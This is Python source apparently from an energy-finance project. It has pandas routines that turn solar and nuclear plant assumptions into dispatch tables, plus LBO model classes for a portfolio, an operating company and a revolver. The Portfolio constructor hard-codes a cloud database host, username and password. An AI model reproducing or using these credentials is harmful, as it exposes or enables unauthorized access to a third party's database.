def load_solar_dispatch(portfolio, scenario, version, plant_name, assumptions_file):
    """Build the long-format dispatch frame for a PPA solar plant from the
    'kean_load_solar' sheet of the assumptions workbook.

    The sheet holds one row per (plant, fsli) with one column per period; it
    is melted to long form, pivoted so each fsli becomes a column, derived
    generation/revenue lines are computed, then melted back into the final
    (company, scenario, version, entity, fsli, period, value) layout.

    Args:
        portfolio: stamped into the output 'company' column.
        scenario, version: tags stamped onto every output row.
        plant_name: plant to filter the sheet on (also the output 'entity').
        assumptions_file: path to the assumptions Excel workbook.

    Returns:
        DataFrame with columns [company, scenario, version, entity, fsli,
        period, value].
    """
    solar_assumptions_df = pd.read_excel(assumptions_file, sheet_name='kean_load_solar')
    plant_assumptions_df = solar_assumptions_df.loc[solar_assumptions_df.plant == plant_name]
    melt_plant_assumptions_df = pd.melt(plant_assumptions_df, id_vars=['plant','fsli'],
                        value_vars=[item for item in list(plant_assumptions_df.columns) if item not in ['plant','fsli']],
                        var_name='period',
                        value_name='value')
    melt_plant_assumptions_df = melt_plant_assumptions_df.reset_index()
    melt_plant_assumptions_df = melt_plant_assumptions_df[['plant','fsli','period','value']]
    melt_plant_assumptions_df = pd.pivot_table(melt_plant_assumptions_df, index=['plant','period'], columns=['fsli'], values='value', aggfunc=np.sum)
    melt_plant_assumptions_df = melt_plant_assumptions_df.reset_index()
    # Derived lines: generation = ICAP * hours * capacity factor; a PPA plant
    # realizes the contract price on every MWh and has no fuel/VOM/emissions.
    melt_plant_assumptions_df['Generation'] = melt_plant_assumptions_df['ICAP'] * (melt_plant_assumptions_df['Hours - On Peak'] + melt_plant_assumptions_df['Hours - Off Peak']) * melt_plant_assumptions_df['Capacity Factor']
    melt_plant_assumptions_df['Generation - On Peak'] = melt_plant_assumptions_df['ICAP'] * melt_plant_assumptions_df['Hours - On Peak'] * melt_plant_assumptions_df['Capacity Factor']
    melt_plant_assumptions_df['Generation - Off Peak'] = melt_plant_assumptions_df['ICAP'] * melt_plant_assumptions_df['Hours - Off Peak'] * melt_plant_assumptions_df['Capacity Factor']
    melt_plant_assumptions_df['Energy Revenue'] = melt_plant_assumptions_df['Generation'] * melt_plant_assumptions_df['PPA']
    melt_plant_assumptions_df['Realized Power Price - Off Peak'] = melt_plant_assumptions_df['PPA']
    melt_plant_assumptions_df['Realized Power Price - On Peak'] = melt_plant_assumptions_df['PPA']
    melt_plant_assumptions_df['Capacity Factor - On Peak'] = melt_plant_assumptions_df['Capacity Factor']
    melt_plant_assumptions_df['Capacity Factor - Off Peak'] = melt_plant_assumptions_df['Capacity Factor']
    melt_plant_assumptions_df['Delivered Fuel Expense'] = 0.0
    melt_plant_assumptions_df['Variable O&M Expense'] = 0.0
    melt_plant_assumptions_df['Net Emissions Expense'] = 0.0
    # Fix: removed a leftover debug dump (to_csv("tttt.csv")) that silently
    # wrote a file to the working directory on every call; the sibling
    # load_nuclear_dispatch has the equivalent line commented out.
    solar_dispatch_df = pd.melt(melt_plant_assumptions_df,id_vars=['plant','period'],
                        value_vars=[item for item in list(melt_plant_assumptions_df.columns) if item not in ['plant','period']],
                        var_name='fsli',
                        value_name='value')
    solar_dispatch_df = solar_dispatch_df.reset_index()
    solar_dispatch_df['company'] = portfolio
    solar_dispatch_df['entity'] = solar_dispatch_df['plant']
    solar_dispatch_df['scenario'] = scenario
    solar_dispatch_df['version'] = version
    solar_dispatch_df = solar_dispatch_df[['company','scenario','version','entity','fsli','period','value']]
    return solar_dispatch_df
def load_nuclear_dispatch(portfolio, scenario, version, plant_name, assumptions_file):
    """Build the long-format dispatch frame for a merchant nuclear plant from
    the 'kean_load_nuclear' sheet of the assumptions workbook.

    Like load_solar_dispatch, the (plant, fsli) x period sheet is melted,
    pivoted so each fsli becomes a column, the derived revenue/expense lines
    are computed, then melted back to the final layout. Unlike solar, revenue
    is hub price adjusted by a percentage basis (on/off peak separately), and
    fuel/VOM expenses are per-MWh.

    Args:
        portfolio: stamped into the output 'company' column.
        scenario, version: tags stamped onto every output row.
        plant_name: plant to filter the sheet on (also the output 'entity').
        assumptions_file: path to the assumptions Excel workbook.

    Returns:
        DataFrame with columns [company, scenario, version, entity, fsli,
        period, value].
    """
    nuclear_assumptions_df = pd.read_excel(assumptions_file, sheet_name='kean_load_nuclear')
    plant_assumptions_df = nuclear_assumptions_df.loc[nuclear_assumptions_df.plant == plant_name]
    melt_plant_assumptions_df = pd.melt(plant_assumptions_df, id_vars=['plant','fsli'],
                        value_vars=[item for item in list(plant_assumptions_df.columns) if item not in ['plant','fsli']],
                        var_name='period',
                        value_name='value')
    melt_plant_assumptions_df = melt_plant_assumptions_df.reset_index()
    melt_plant_assumptions_df = melt_plant_assumptions_df[['plant','fsli','period','value']]
    melt_plant_assumptions_df = pd.pivot_table(melt_plant_assumptions_df, index=['plant','period'], columns=['fsli'], values='value', aggfunc=np.sum)
    melt_plant_assumptions_df = melt_plant_assumptions_df.reset_index()
    # Generation = ICAP * hours * capacity factor (total and per peak bucket).
    melt_plant_assumptions_df['Generation'] = melt_plant_assumptions_df['ICAP'] * (melt_plant_assumptions_df['Hours - On Peak'] + melt_plant_assumptions_df['Hours - Off Peak']) * melt_plant_assumptions_df['Capacity Factor']
    melt_plant_assumptions_df['Generation - On Peak'] = melt_plant_assumptions_df['ICAP'] * melt_plant_assumptions_df['Hours - On Peak'] * melt_plant_assumptions_df['Capacity Factor']
    melt_plant_assumptions_df['Generation - Off Peak'] = melt_plant_assumptions_df['ICAP'] * melt_plant_assumptions_df['Hours - Off Peak'] * melt_plant_assumptions_df['Capacity Factor']
    # Realized price = hub price * (1 + % basis), applied per peak bucket.
    melt_plant_assumptions_df['Energy Revenue - On Peak'] = melt_plant_assumptions_df['Generation - On Peak'] * (melt_plant_assumptions_df['Hub Price - On Peak'] * ( 1 + melt_plant_assumptions_df['Basis_% - On Peak']))
    melt_plant_assumptions_df['Energy Revenue - Off Peak'] = melt_plant_assumptions_df['Generation - Off Peak'] * (melt_plant_assumptions_df['Hub Price - Off Peak'] * ( 1 + melt_plant_assumptions_df['Basis_% - Off Peak']))
    melt_plant_assumptions_df['Energy Revenue'] = melt_plant_assumptions_df['Energy Revenue - On Peak'] + melt_plant_assumptions_df['Energy Revenue - Off Peak']
    # Per-MWh fuel and VOM costs scaled by total generation; no emissions.
    melt_plant_assumptions_df['Delivered Fuel Expense'] = melt_plant_assumptions_df['Generation'] * melt_plant_assumptions_df['Fuel Costs']
    melt_plant_assumptions_df['Variable O&M Expense'] = melt_plant_assumptions_df['Generation'] * melt_plant_assumptions_df['VOM']
    melt_plant_assumptions_df['Net Emissions Expense'] = 0.0
    melt_plant_assumptions_df['Realized Power Price - Off Peak'] = melt_plant_assumptions_df['Hub Price - Off Peak'] * ( 1 + melt_plant_assumptions_df['Basis_% - Off Peak'])
    melt_plant_assumptions_df['Realized Power Price - On Peak'] = melt_plant_assumptions_df['Hub Price - On Peak'] * ( 1 + melt_plant_assumptions_df['Basis_% - On Peak'])
    melt_plant_assumptions_df['Capacity Factor - On Peak'] = melt_plant_assumptions_df['Capacity Factor']
    melt_plant_assumptions_df['Capacity Factor - Off Peak'] = melt_plant_assumptions_df['Capacity Factor']
    melt_plant_assumptions_df.rename(columns={'Hours - On Peak':'on_hours','Hours - Off Peak':'off_hours'}, inplace=True)
    # solar_dispatch_df = melt_plant_assumptions_df
    # melt_plant_assumptions_df.to_csv("tttt.csv")
    # sys.exit()
    # solar_dispatch_df.to_csv("solar_dispatch_df.csv")
    # Melt back to long form and stamp identity columns.
    nuclear_dispatch_df = pd.melt(melt_plant_assumptions_df,id_vars=['plant','period'],
                        value_vars=[item for item in list(melt_plant_assumptions_df.columns) if item not in ['plant','period']],
                        var_name='fsli',
                        value_name='value')
    nuclear_dispatch_df = nuclear_dispatch_df.reset_index()
    nuclear_dispatch_df['company'] = portfolio
    nuclear_dispatch_df['entity'] = nuclear_dispatch_df['plant']
    nuclear_dispatch_df['scenario'] = scenario
    nuclear_dispatch_df['version'] = version
    nuclear_dispatch_df = nuclear_dispatch_df[['company','scenario','version','entity','fsli','period','value']]
    return nuclear_dispatch_df
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,753 | changliukean/KEAN3 | refs/heads/master | /model/andrew_sample.py | #TODO: Add check to see if revolver draw necessary
#TODO: Add check to see if need to go below target working capital to make DSC
#TODO: Add Act/360 day_count_factor to utilities
#TODO: Add proper calc of average daily balance for Revolver (lc fees, unused lines, interest expense)
#TODO: Modify ptd calcs to allow for non-calendar year end payment periods
#TODO: Fix InterestRateSwaps in instruments module - calc correct interest payment
#TODO: Build Interest Expense support report
#TODO: Build PTD support report
#TODO: Add forecasted capex to PTD calculation
#TODO: If have multiple DSRAs, each is only valid for its own instrument (pari passu solves it?)
#TODO: Fix ptd cleanup to correct for lack of cash to make full payment
import os
import sys
from pathlib import Path
path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
path_utilities = path + '/utility/'
sys.path.insert(0, path_utilities)
import utilities as utils
import instruments as ins
path_test = path + '/test/'
sys.path.insert(0, path_test)
from lbo_waterfall_scenarios import get_cap_structure, get_waterfall, get_portfolio
from lbo_reports import create_lbo_support_report, create_waterfall_report
from datetime import date, datetime
from dateutil.relativedelta import relativedelta
import pandas as pd
import numpy as np
from scipy.optimize import fsolve
import openpyxl as opx
from collections import namedtuple
class Portfolio:
    """Container for a levered portfolio: scenario/version identifiers, key
    dates, tax assumptions, and the period-to-date (PTD) tax payments made
    so far.

    NOTE(review): instruments are expected to be attached elsewhere as
    ``self.instruments`` (a dict keyed by instrument label) -- confirm
    against the caller that builds the portfolio.
    """

    def __init__(self, **kwargs):
        self.label = kwargs['label']  # TODO: where does this get used?
        self.portfolio_scenario = kwargs['portfolio_scenario']
        self.portfolio_version = kwargs['portfolio_version']
        self.cap_struct_scenario = kwargs['cap_struct_scenario']
        self.cap_struct_version = kwargs['cap_struct_version']
        self.waterfall_scenario = kwargs['waterfall_scenario']
        self.waterfall_version = kwargs['waterfall_version']
        self.close_date = kwargs['close_date'].date()
        self.terminal_date = kwargs['terminal_date'].date()
        # yield-curve settings are optional
        try:
            self.yield_curve_date = kwargs['yield_curve_date']
        except KeyError:
            pass
        try:
            self.yield_curve_version = kwargs['yield_curve_version']
        except KeyError:
            pass
        self.etr = kwargs['effective_tax_rate']
        self.first_payment_date = kwargs['first_payment_date'].date()
        self.periodicity_months_ptd = kwargs['periodicity_months_ptd']
        self.ptd = {}  # PTD tax payments made, keyed by period date
        # TODO: what is a better way to encapsulate the database connection?
        # SECURITY NOTE(review): credentials are hard-coded in source; move
        # them to environment variables or a secrets store.
        HOST = 'kindledb.cfdmlfy5ocmf.us-west-2.rds.amazonaws.com'
        USER = 'Andrew'
        PASSWORD = 'Kindle01'
        DATABASE = 'kean'
        self.cnx = utils.generate_connection_instance(HOST, USER, PASSWORD, DATABASE)
        return

    def get_amount(self, item, period, cash=0, prepayments=0.0):
        """Return the portfolio-level cash flow for *item* at *period*.

        Known items: 'ptd' and 'ptd cleanup'; anything else is fatal.
        """
        if item == 'ptd':
            amount = self.calc_ptd(period, prepayments)
        elif item == 'ptd cleanup':
            amount = self.calc_ptd_cleanup(period, prepayments)
        else:
            print('ERROR in portfolio get_amount, unknown item - ', item)
            sys.exit()
        return amount

    def set_amount(self, item, period, cash_flow):
        """Record the cash flow for *item* at *period*."""
        if item == 'ptd':
            self.ptd[period] = cash_flow
        elif item == 'ptd cleanup':
            # only necessary for optimization runs, zero when complete
            pass
        else:
            # BUG FIX: original used '.' instead of ',' after the message,
            # which raised AttributeError instead of reporting the error
            print('ERROR in portfolio set_amount, unknown item - ', item)
            sys.exit()
        return

    def is_payment_date(self, period):
        """True when *period* falls on a scheduled PTD payment date."""
        if period < self.first_payment_date:
            result = False
        elif period > utils.calc_next_month_end(self.terminal_date, 'date', self.periodicity_months_ptd):
            result = False
        elif (period.year * 12 + period.month - self.first_payment_date.year * 12
              - self.first_payment_date.month) % self.periodicity_months_ptd == 0:
            result = True
        else:
            result = False
        return result

    def calc_number_ptd_payments_remaining(self, period):
        """Number of PTD payment dates left in *period*'s calendar (tax)
        year, including the current one."""
        if period.year == self.terminal_date.year:
            number_ptd_payments = int((self.terminal_date.month - period.month) / self.periodicity_months_ptd) + 1
        else:
            number_ptd_payments = int((12 - period.month) / self.periodicity_months_ptd) + 1
        return number_ptd_payments

    def calc_ptd(self, period, prepayments, flag_cleanup=False):
        """Estimate the PTD tax payment due at *period*.

        Walks the portfolio's instruments to accumulate taxable EBITDA, cash
        interest and tax depreciation for the current tax year, applies the
        effective tax rate, subtracts what has already been paid this year,
        and spreads the remainder over the remaining payment dates.  With
        ``flag_cleanup`` set, the current period's own PTD payment is
        excluded from the already-paid total (used by calc_ptd_cleanup).
        """
        number_payments = self.calc_number_ptd_payments_remaining(period)
        ptd = 0.0
        if self.is_payment_date(period):
            month_number = (period.year * 12 + period.month) - (self.close_date.year * 12 + self.close_date.month)
            if period.year == self.close_date.year:
                months_in_tax_year = 12 - self.close_date.month + 1  # assumes close date is start of month
            elif period.year == self.terminal_date.year:
                months_in_tax_year = self.terminal_date.month  # assumes terminal date is last day of month
            else:
                months_in_tax_year = 12
            tax_ebitda = 0.0
            tax_capex = 0.0
            # ROBUSTNESS FIX: initialize so a portfolio without an OpCo or
            # debt instrument does not raise NameError below
            tax_depreciation = 0.0
            cash_interest = 0.0
            # BUG FIX: loop variable renamed from 'ins' (it shadowed the
            # imported instruments module) and 'portfolio.instruments'
            # corrected to 'self.instruments' (leaked module-level global).
            for key in self.instruments:
                if self.instruments[key].type == 'OperatingCompany':
                    ebitda = self.instruments[key].ebitda  # dict of cash flows
                    capex = self.instruments[key].capex    # dict of cash flows
                    for cashflow in ebitda:
                        if cashflow.year == period.year and cashflow >= self.close_date:
                            tax_ebitda += ebitda[cashflow]
                    # NOTE(review): tax_capex is accumulated but never used
                    # below -- presumably it should feed the depreciation
                    # calc; confirm intent
                    for cashflow in capex:
                        if cashflow.year == period.year and cashflow >= self.close_date:
                            tax_capex += capex[cashflow]
                    # NOTE(review): '=' (not '+=') keeps only the last OpCo's
                    # depreciation, as in the original -- confirm intent
                    tax_depreciation = -self.instruments[key].tax_register.calc_depreciation(period)
                if self.instruments[key].type in ['Debt', 'FixedDebt', 'FloatingDebt', 'MezzanineDebt']:
                    cash_interest = self.instruments[key].calc_tax_interest(period, prepayments, month_number, months_in_tax_year)
            ptd_paid = 0.0
            for cashflow in self.ptd:
                if cashflow.year == period.year:
                    if flag_cleanup and cashflow == period:
                        pass
                    else:
                        ptd_paid += self.ptd[cashflow]
            ptd_tax_year = -(tax_ebitda + cash_interest + tax_depreciation) * self.etr
            ptd = (ptd_tax_year - ptd_paid) / number_payments
        return ptd

    def calc_ptd_cleanup(self, period, prepayments):
        """Recompute PTD with the actual (not solver-estimated) prepayments
        for the current period and return the difference vs. what was paid."""
        flag_cleanup = True
        ptd_cleanup = 0.0
        # BUG FIX: original tested the bound method object
        # ('if self.is_payment_date:'), which is always truthy; call it.
        if self.is_payment_date(period):
            month_number = (period.year * 12 + period.month) - (self.close_date.year * 12 + self.close_date.month)
            # BUG FIX: same global/shadowing fix as in calc_ptd
            for key in self.instruments:
                if self.instruments[key].type in ['Debt', 'FixedDebt', 'FloatingDebt']:
                    if self.instruments[key].flag_prepayable:
                        prepayments[month_number] = self.instruments[key].prepayments[period]
            ptd = self.calc_ptd(period, prepayments, flag_cleanup)
            ptd_cleanup = ptd - self.ptd[period]
        return ptd_cleanup
class OperatingCompany:
    """Operating company: holds a working-capital balance and pulls CFO,
    EBITDA and capex forecasts from the ``financials`` table.

    NOTE(review): the query methods use the module-level ``cnx`` connection
    and ``UNITS`` scaling constant defined elsewhere in this module.
    """
    # TODO figure out how to load CFO from database

    def __init__(self, **kwargs):
        self.type = kwargs['class']
        self.label = kwargs['label']
        self.working_capital = kwargs['working_capital'] / UNITS
        self.working_capital_target = kwargs['working_capital_target'] / UNITS
        self.interest_rate_wc = kwargs['interest_rate_wc']
        self.periodicity_months = kwargs['periodicity_months']
        self.day_count = kwargs['day_count']
        self.scenario_date_start = kwargs['scenario_date_start'].date()
        self.scenario_date_end = kwargs['scenario_date_end'].date()
        # financials selection is optional; the query methods check for it
        try:
            self.financials_scenario = kwargs['financials_scenario']
            self.financials_version = kwargs['financials_version']
            self.financials_company = kwargs['financials_company']
            self.financials_entity = kwargs['financials_entity']
        except KeyError:
            pass
        self.flag_tax_asset_detail = kwargs['flag_tax_asset_detail']
        self.cfo = self.get_cfo()        # dict (date -> amount)
        self.ebitda = self.get_ebitda()  # dict (date -> amount)
        self.capex = self.get_capex()    # dict (date -> amount)
        self.get_tax_register()
        # histories kept for reporting, all keyed by period date
        self.working_capital_history = {}
        self.cfo_history = {}
        self.interest_income_history = {}
        self.working_capital_change = {}

    def get_cfo(self):
        """Return CFO ('EBITDA less Capex') by period from the database."""
        # TODO: allow for specific company and entity in query
        # use dict initially, consider dataframe on refactor
        if hasattr(self, 'financials_scenario'):
            query = ("SELECT period, sum(value) as value FROM financials WHERE scenario = %s AND version = %s AND "
                     "account = 'EBITDA less Capex' GROUP BY period")
            df_cfo = pd.read_sql(query, cnx, params=(self.financials_scenario, self.financials_version), index_col=['period'])
            df_cfo['value'] = df_cfo['value'] / UNITS
            cfo = df_cfo.to_dict()['value']
            return cfo
        # CONSISTENCY FIX: previously fell through and returned None
        # silently; fail loudly like get_ebitda / get_capex do
        print('ERROR - no financials selected for OpCo get_cfo')
        sys.exit()

    def get_ebitda(self):
        """Return EBITDA by period from the database."""
        # TODO: allow for specific company and entity in query
        # use dict initially, consider dataframe on refactor
        if hasattr(self, 'financials_scenario'):
            query = ("SELECT period, sum(value) as value FROM financials WHERE scenario = %s AND version = %s AND "
                     "account = 'EBITDA' GROUP BY period")
            df_ebitda = pd.read_sql(query, cnx, params=(self.financials_scenario, self.financials_version), index_col=['period'])
            df_ebitda['value'] = df_ebitda['value'] / UNITS
            ebitda = df_ebitda.to_dict()['value']
        else:
            print('ERROR - no financials selected for OpCo get_ebitda')
            sys.exit()
        return ebitda

    def get_capex(self):
        """Return total capex (maintenance/environmental/LTSA/growth) by
        period from the database."""
        # TODO: allow for specific company and entity in query
        # use dict initially, consider dataframe on refactor
        if hasattr(self, 'financials_scenario'):
            query = ("SELECT period, sum(value) as value FROM financials WHERE scenario = %s AND version = %s AND "
                     "account in ('Maintenance Capex', 'Environmental Capex', 'LTSA Capex', 'Growth Capex') GROUP BY period")
            df_capex = pd.read_sql(query, cnx, params=(self.financials_scenario, self.financials_version), index_col=['period'])
            df_capex['value'] = df_capex['value'] / UNITS
            capex = df_capex.to_dict()['value']
        else:
            # BUG FIX: message previously said 'get_ebitda'
            print('ERROR - no financials selected for OpCo get_capex')
            sys.exit()
        return capex

    def get_tax_register(self):
        """Build the tax asset register from the spreadsheet when detailed
        tax asset data is flagged; otherwise leave the register unset.

        NOTE(review): TaxRegister, FixedAsset and get_tax_register_from_xlsx
        must be defined elsewhere in this module -- confirm.
        """
        if self.flag_tax_asset_detail:
            self.tax_register = TaxRegister(self.label)
            tax_assets = get_tax_register_from_xlsx()
            for asset in tax_assets:
                self.tax_register.add_asset(FixedAsset(*asset))
        return

    def get_amount(self, metric, period, cash=0, prepay=0.0):
        """Return the cash flow for *metric* at *period* (positive inflow)."""
        if metric == 'CFO':
            try:
                amount = self.cfo[period]
            except KeyError:
                # ROBUSTNESS FIX: exit instead of falling through with
                # 'amount' unbound (previously raised UnboundLocalError)
                print("ERROR - invalid date for CFO ", period)
                sys.exit()
        elif metric == 'working capital':
            amount = max(self.working_capital, 0)
        elif metric == 'interest income':
            amount = self.calc_interest_income(period)
        elif metric == 'sweep':
            # should be last item in waterfall; happens on non-quarter-end
            # months; cash sits in the bank account
            amount = -cash
        elif metric == 'working capital reset':
            amount = max(-self.working_capital_target, -cash)
        else:
            print("Error in OperatingCompany get_amount - unknown metric ", metric)
            sys.exit()
        return amount

    def set_amount(self, item, period, cash_flow):
        """Record *cash_flow* for *item* at *period*; working-capital items
        also move the working-capital balance."""
        if item == 'CFO':
            self.cfo_history[period] = cash_flow
        elif item == 'interest income':
            self.interest_income_history[period] = cash_flow
        elif item == 'working capital':
            self.working_capital_history[period] = self.working_capital
            self.working_capital_change[period] = cash_flow
            self.working_capital -= cash_flow
        elif item == 'working capital reset':
            self.working_capital -= cash_flow
        elif item == 'sweep':
            self.working_capital -= cash_flow
        else:
            print('Error - unknown item in OperatingCompany set_amount ', item)
        return

    def calc_prior_payment_period(self, period):
        """Return the payment period immediately before *period*, the
        scenario start for the first stub period, or None outside the
        scenario window."""
        if period <= self.scenario_date_start:
            prior_period = None
        elif period > self.scenario_date_end:
            # check if stub final period
            if utils.calc_next_month_end(self.scenario_date_end, 'date', self.periodicity_months) < period:
                prior_period = None
            else:
                prior_period = utils.calc_next_month_end(period, 'date', -self.periodicity_months)
        elif period < utils.calc_next_month_end(self.scenario_date_start, 'date', +self.periodicity_months):
            prior_period = self.scenario_date_start
        else:
            prior_period = utils.calc_next_month_end(period, 'date', -self.periodicity_months)
        return prior_period

    def calc_interest_income(self, period):
        """Interest income earned on the working-capital balance for the
        period ending at *period* (capped at the scenario end date)."""
        period_end = min(period, self.scenario_date_end)
        day_count_factor = utils.calc_day_count_factor(self.day_count, self.calc_prior_payment_period(period), period_end)
        interest = self.working_capital * self.interest_rate_wc * day_count_factor
        return interest
class Revolver:
    """Revolving credit facility: tracks draws, sweeps (repayments),
    letter-of-credit and undrawn-line fees, and floating-rate interest off
    a LIBOR curve pulled from the prices table.

    NOTE(review): uses module-level globals cnx, UNITS, YIELD_CURVE_VERSION,
    YIELD_CURVE_DATE and PORTFOLIO_START_DATE defined elsewhere in the file.
    """

    def __init__(self, **kwargs):
        self.type = kwargs['class']
        self.label = kwargs['label']
        # NOTE(review): issue_date is kept as a datetime while maturity and
        # first_payment_date are converted to date -- confirm callers compare
        # these consistently
        self.issue_date = kwargs['issue_date']
        self.term = kwargs['term']  # months
        self.maturity_date = self.issue_date + relativedelta(months=+self.term) + relativedelta(days=-1)
        self.maturity_date = self.maturity_date.date()
        self.credit_line = kwargs['credit_line'] / UNITS
        self.initial_balance = kwargs['initial_balance'] / UNITS
        self.index_name = kwargs['index_name']
        self.margin = kwargs['margin']
        self.day_count = kwargs['day_count']
        self.periodicity_months = kwargs['periodicity_months']
        self.undrawn_line_fee = kwargs['undrawn_line_fee']
        # optional inputs
        try:
            self.dsra = kwargs['dsra'] / UNITS
        except KeyError:
            pass
        self.dsra_months = kwargs['dsra_months']
        self.first_payment_date = kwargs['first_payment_date'].date()
        try:
            self.letters_of_credit = kwargs['letters_of_credit'] / UNITS
        except KeyError:
            self.letters_of_credit = 0.0
        try:
            self.lc_fee_rate = kwargs['lc_fee_rate']
        except KeyError:
            self.lc_fee_rate = 0.0
        self.principal = self.initial_balance
        self.set_index()
        # cash-flow histories, all keyed by period date
        self.line_fees = {}
        self.lc_fees = {}
        self.interest_expense = {}
        self.dsra_change = {}
        self.dsra_release = {}
        self.draws = {}
        self.sweeps = {}

    def set_index(self):
        """Load the month-end adjusted LIBOR curve from the KEAN database."""
        self.index = self.get_adj_libor()
        return

    def get_libor(self):
        """Return a dataframe of forward rates for this facility's index.

        Assumes LIBOR-1MO initially.
        TODO: allow different scenarios and versions.
        """
        query = ("SELECT period, price FROM prices WHERE scenario = 'Actuals' AND version = %s "
                 "AND instrument_id = %s AND valuation_date = %s ORDER BY period")
        df = pd.read_sql(query, cnx, params=(YIELD_CURVE_VERSION, self.index_name, YIELD_CURVE_DATE))
        return df

    def get_adj_libor(self):
        """Convert the raw forward curve from get_libor into a dict keyed by
        month-end dates, interpolating (and extrapolating at the edges)
        linearly on days.

        TODO: overload start and end date to allow extrapolation of rates.
        """
        df = self.get_libor()
        period = utils.calc_month_end(df['period'].min(), 'date')
        curve = {}
        while period < df.iloc[0]['period']:
            # extrapolate backwards - should never happen
            increment = (df.iloc[1]['price'] - df.iloc[0]['price']) / (df.iloc[1]['period'] - df.iloc[0]['period']).days
            interval = (df.iloc[0]['period'] - period).days
            curve[period] = df.iloc[0]['price'] - interval * increment
            period = utils.calc_next_month_end(period, 'date')
        while period <= df['period'].max():
            # interpolate between the nearest curve points
            bottom_date = max(df.loc[(df['period'] <= period)]['period'])
            bottom_yield = df.loc[df['period'] == bottom_date]['price'].values[0]
            if period == bottom_date:
                curve[period] = bottom_yield
            elif df.loc[df['period'] > period].shape[0] == 0:
                # need to extrapolate - does not happen unless overload start and end dates
                increment = (df.iloc[-1]['price'] - df.iloc[-2]['price']) / ((df.iloc[-1]['period'] - df.iloc[-2]['period']).days)
                interval = (period - df.iloc[-1]['period']).days
                curve[period] = df.iloc[-1]['price'] + interval * increment
            else:
                top_date = min(df.loc[(df['period'] >= period)]['period'])
                bottom_yield = df.loc[df['period'] == bottom_date]['price'].values[0]
                top_yield = df.loc[df['period'] == top_date]['price'].values[0]
                increment = (top_yield - bottom_yield) / (top_date - bottom_date).days
                interval = (period - bottom_date).days
                curve[period] = bottom_yield + interval * increment
            period = utils.calc_next_month_end(period, 'date')
        return curve

    def get_amount(self, item, period, cash=0, prepay=0.0):
        """Return the revolver cash flow for *item* at *period*
        (negative = outflow)."""
        if item == 'undrawn line fee':
            if self.is_payment_date(period):
                try:
                    amount = self.calc_undrawn_line_fee(period)
                except Exception:
                    print("ERROR - invalid date for Revolver ", period)
                    sys.exit()
            else:
                amount = 0.0
        elif item == 'lc fees':
            if self.is_payment_date(period):
                amount = self.calc_lc_fees(period)
            else:
                amount = 0.0
        elif item == 'draw':
            # maximum additional amount that can be drawn on the line
            amount = self.credit_line - self.principal - self.letters_of_credit
        elif item == 'interest expense':
            if self.is_payment_date(period):
                amount = -self.calc_interest_expense(period)
            else:
                amount = 0.0
        elif item == 'dsra reset':
            # amount = self.calc_dsra_change(period)
            amount = 0.0
        elif item == 'dsra release':
            # placeholder
            amount = 0.0
        elif item == 'sweep':
            amount = -(self.principal)
        else:
            # BUG FIX: error path referenced undefined name 'metric'
            print("Error in Revolver get_amount - unknown metric ", item)
            sys.exit()
        return amount

    def set_amount(self, item, period, cash_flow):
        """Record *cash_flow* for *item* at *period*; draws and sweeps also
        move the outstanding principal."""
        if item == 'undrawn line fee':
            self.line_fees[period] = cash_flow
        elif item == 'lc fees':
            self.lc_fees[period] = cash_flow
        elif item == 'interest expense':
            self.interest_expense[period] = cash_flow
        elif item == 'dsra change':
            self.dsra_change[period] = cash_flow
        elif item == 'dsra release':
            self.dsra_release[period] = cash_flow
        elif item == 'draw':
            self.draws[period] = cash_flow
            self.principal += cash_flow
        elif item == 'sweep':
            self.sweeps[period] = cash_flow
            self.principal += cash_flow
        else:
            print('Error - unknown item in Revolver set_amount ', item)
        return

    def is_payment_date(self, period):
        """True when *period* falls on one of this facility's payment dates."""
        if period < self.first_payment_date:
            result = False
        elif period > utils.calc_next_month_end(self.maturity_date, 'date', self.periodicity_months):
            result = False
        elif (period.year * 12 + period.month - self.first_payment_date.year * 12
              - self.first_payment_date.month) % self.periodicity_months == 0:
            result = True
        else:
            result = False
        return result

    def calc_prior_payment_period(self, period):
        """Return the payment date before *period* (the issue date for the
        first payment).  Only valid for actual payment dates."""
        if period == self.first_payment_date:
            prior_period = self.issue_date
        else:
            prior_period = utils.calc_next_month_end(period, 'date', -self.periodicity_months)
        return prior_period

    def calc_interest_rate(self, period):
        """Set self.interest_rate to the index rate at *period* plus margin."""
        try:
            self.interest_rate = self.index[period] + self.margin
        except KeyError:
            print("Error in calc_interest_rate - invalid period ", period)
        return

    def calc_interest_expense(self, period):
        """Interest on the beginning-of-period drawn balance for the payment
        period ending at *period*."""
        day_count_factor = utils.calc_day_count_factor(self.day_count, self.calc_prior_payment_period(period), period)
        self.calc_interest_rate(period)
        interest = self.calc_principal_bop(period) * self.interest_rate * day_count_factor
        return interest

    def calc_dsra(self, period):
        """Required DSRA balance at *period*: dsra_months worth of LC fees,
        undrawn line fees and interest expense.

        Initially assumes no paydown of debt (removes circularity of calc).
        TODO: include paydown of debt.
